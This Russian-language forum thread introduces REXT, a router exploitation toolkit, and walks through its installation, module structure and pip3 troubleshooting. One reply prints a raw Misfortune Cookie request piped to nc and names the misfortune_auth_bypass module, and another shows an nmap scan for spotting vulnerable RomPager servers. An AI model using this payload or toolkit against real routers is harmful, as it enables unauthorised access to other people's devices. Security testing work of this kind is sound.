Rext v1.0.0 - Router Exploitation Toolkit

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Привет! В этой статье речь пойдет об утилите, в которой собраны эксплойты для внешних устройств, в частности роутеров. Называется она REXT - Router Exploitation Toolkit.

upload_2016-12-31_1-27-1.png


Она предназначена для создания и использования, различных Python – скриптов, которые будут работать с различными внешними устройствами.

Список изменений в финальном релизе:

· Добавлен исправленный WT2000ARM harvester, использующий bs4 – Это библиотека Beautiful Soup Beautiful Soup - парсер для синтаксического разбора файлов HTML/XML, написанный на языке программирования Python, который может преобразовать даже неправильную разметку в дерево синтаксического разбора. Он поддерживает простые и естественные способы навигации, поиска и модификации дерева синтаксического разбора.

· Paramiko – Добавлен к требованиям.

· http_ping.py переименован в http_get.

· Новая база данных содержащая плохие пары SSH+key и модули для проверки ключей против объекта.

Установим программу с github:

> git clone https://github.com/j91321/rext

> cd rext/

upload_2016-12-31_1-27-44.png


Установим зависимости:

> pip install –r requirements.txt


upload_2016-12-31_1-28-19.png


Затем можно запустить утилиту:

> ./rext.py

upload_2016-12-31_1-28-48.png


Структура программы:

> core - содержит большинство основных функций ToolKits

> databases - содержит базы данных, как по умолчанию учетные данные и т.д.

> interface - содержит код, который используется для создания и манипулирования с интерфейсом.

> modules - содержит структуру модулей, которые могут быть загружены, каждый модуль содержит специфические для каждого поставщика подмодули, где хранятся все скрипты.

· Exploits

· Harvesters

· Misc

· Scanners

· Output

Требования:

· Python 3, request v2.9.1

Обновление:

> cd rext

> git pull

> pip3 install -r requirements.txt

Затем:

> python3 rext.py

Ознакомиться со списком модулей можно командой:

> show

upload_2016-12-31_1-29-53.png


А получить справку командой:

> help

Спасибо за прочтение.
 
I

Inject0r

Полезная программулина, вот статья про очень интересную уязвимость , утилита позволяет ее экплуатировать.
 
Последнее редактирование модератором:
  • Нравится
Реакции: Dr.Lafa, kot-gor и Vander

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Полезная программулина, вот статья про очень интересную уязвимость *****, утилита позволяет ее экплуатировать.

Пример запроса выглядит так:
[HIDE=10]echo $'GET / HTTP/1.1\nCookie: C107353880=\x00' | nc <IP> <Port>

в Rext

8741564.png

[doublepost=1483520567,1483516826][/doublepost]И данный эксплоит входит в Rext

8775344.png


8772272.png


Сканер - можно определить есть уязвимость или нет

8734384.png

Как видим RomPager не запущен, значит нет возможности эксплуатации уязвимости.
[doublepost=1483521313][/doublepost]harvesters/airlive/WT2000ARM>

Харвестер содержит модуль только для работы с WT2000ARM (ADSL Router)
001.jpg
 
I

Inject0r

Как определить есть ли RomPager в роутере без запуска этой утилиты:
nmap -sS -sV -p 80 192.168.0.1
Веб-сервер может быть и не на 80 порту, вместо 192.168.0.1 ваш айпишник роутера, внутренний или внешний, если вебка наружу торчит. В поле описания порта будет найден сервис RomPager. В моем случае висит сервис micro_httpd, значит атака не прокатит.
8a9ea2eb52d6.jpg
 
Последнее редактирование модератором:
  • Нравится
Реакции: Vander и ghostphisher

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Такая беда:
На одних системах Пэррот
load exploits/allegrosoft/misfortune_auth_bypass ---> exploits/allegrosoft/misfortune_auth_bypass> (ВСЕ ОК)
на других
load exploits/allegrosoft/misfortune_auth_bypass ---> module doesn't exit

Системы одинаковые, скачать и переставить не помогло. Из 5 систем Пэррот завелся на 2 ( которые уже стояли давно и были обновлены до свежей версии через dist-upgrade) а 3 системы, которые ставились сразу свежаком ( скачены с оф сайта последние версии) вот такую ерунду с rext выдают :) Очень странно, с чем это связано?

Вопрос решился, может кому пригодится, вообще все глупо и из-за невнимательности.

После установки надо обязательно сделать как писал ТС, в том числе и pip3 install -r requirements
на свежих системах этого не сделали, отделавшись только pip ( без 3)
попытавшись выполнить pip3 система конечно не нашла такой команды. Доставляем пакет #apt-get install python3-pip далее без проблем делаем pip3 install -r requirements и все работает :)
 
Последнее редактирование:
  • Нравится
Реакции: Vander и valerian38
D

diklee

слабоват этот проект еще. сплойтов - кот наплакал. до роутерсплойта далековато. роутерсплойт уже даже айпикамеры включил в поддержку.
 

shArky

Green Team
07.01.2017
47
41
BIT
1
С моей специфичной Linux (Elementary OS) не так всё просто с установкой. Комп используется мной частично. Ладно это было отступление от темы. Если кто-то пользуется такой же Linux, то Вам надо ввести в Google запрос pip installtion guide, найти официальную страницу, скачать get-pip.py, с помощью команды sudo python get-pip.py его установить, python конечно ругнётся на pip, но без этого вылезают ошибки и pip не ставится. Ну вот опять "рекламная" пауза. Ладно. Идём по пути ../rext и с помощью команды cat выводит содержимое файла requirements.txt, потом по очереди ставим с помощью sudo pip. Надеюсь помог тем, кто столкнулся с подобной проблемой.
 
S

septagrammer

С моей специфичной Linux (Elementary OS) не так всё просто с установкой. Комп используется мной частично. Ладно это было отступление от темы. Если кто-то пользуется такой же Linux, то Вам надо ввести в Google запрос pip installtion guide, найти официальную страницу, скачать get-pip.py, с помощью команды sudo python get-pip.py его установить, python конечно ругнётся на pip, но без этого вылезают ошибки и pip не ставится. Ну вот опять "рекламная" пауза. Ладно. Идём по пути ../rext и с помощью команды cat выводит содержимое файла requirements.txt, потом по очереди ставим с помощью sudo pip. Надеюсь помог тем, кто столкнулся с подобной проблемой.
на всех виндовсах пип ставится так же
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!